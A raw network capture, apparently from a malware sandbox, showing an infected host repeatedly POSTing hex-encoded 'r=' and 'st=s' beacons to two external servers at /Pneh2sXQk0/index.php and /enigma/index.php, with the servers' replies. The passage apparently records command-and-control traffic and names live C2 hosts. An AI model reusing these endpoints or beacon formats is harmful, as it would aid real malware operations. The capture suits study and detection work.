Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:45.962289095 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:46.208838940 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1480 | 192.168.2.5 | 51336 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:45.989609957 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:46.239198923 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1481 | 192.168.2.5 | 51337 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:46.461107969 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:46.711839914 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1482 | 192.168.2.5 | 51338 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:46.573121071 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:46.820507050 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1483 | 192.168.2.5 | 51339 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:47.042798996 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:47.292421103 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1484 | 192.168.2.5 | 51340 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:47.074836969 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:47.329559088 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1485 | 192.168.2.5 | 51341 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:47.541368961 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:47.789307117 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1486 | 192.168.2.5 | 51342 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:47.664446115 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:47.911456108 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1487 | 192.168.2.5 | 51343 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:48.118308067 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:48.366550922 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1488 | 192.168.2.5 | 51344 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:48.159632921 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:48.407752991 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1489 | 192.168.2.5 | 51345 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:48.618432999 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:48.868678093 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1490 | 192.168.2.5 | 51346 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:48.742523909 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:48.988013029 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1491 | 192.168.2.5 | 51347 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:49.197108030 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:49.444839001 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1492 | 192.168.2.5 | 51348 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:49.237808943 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:49.487272024 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1493 | 192.168.2.5 | 51349 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:49.695616007 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:49.947695971 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1494 | 192.168.2.5 | 51350 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:49.822570086 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:50.071904898 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1495 | 192.168.2.5 | 51351 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:50.279078007 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:36:50.530580044 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1496 | 192.168.2.5 | 51352 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:50.331437111 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:36:50.588300943 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1497 | 192.168.2.5 | 51353 | 193.233.132.56 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:50.781608105 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:36:51.032155991 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port
1498 | 192.168.2.5 | 51354 | 193.233.132.167 | 80
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:36:50.930388927 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:36:51.175688028 CEST    197    IN    HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:36:51 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
